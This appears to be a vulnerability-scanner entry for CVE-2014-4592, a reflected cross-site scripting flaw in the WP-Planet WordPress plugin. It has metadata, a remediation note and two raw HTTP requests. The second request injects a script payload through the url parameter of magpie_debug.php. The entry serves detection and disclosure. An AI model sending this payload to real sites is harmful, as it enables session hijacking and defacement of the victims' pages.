| Title | WP Planet <= 0.1 - Cross-Site Scripting |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Attackers can execute arbitrary scripts in the victim's browser, leading to session hijacking or defacement. |
| Remediation | Update to the latest version of WP-Planet plugin that addresses this vulnerability or remove the vulnerable script. |
| CVSS Score | 6.1 |
| EPSS Score | 0.03802 |
| CVE ID | CVE-2014-4592 |
| CWE ID | CWE-79 |
| Tags | cve2014 cve wordpress wp-plugin xss wpscan unauth czepol vuln |
A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Connection: close
Accept-Encoding: gzip
GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-4592.yaml
🦈 Packet Capture: ⬇️ Download cve-2014-4592.pcap
N/AN/A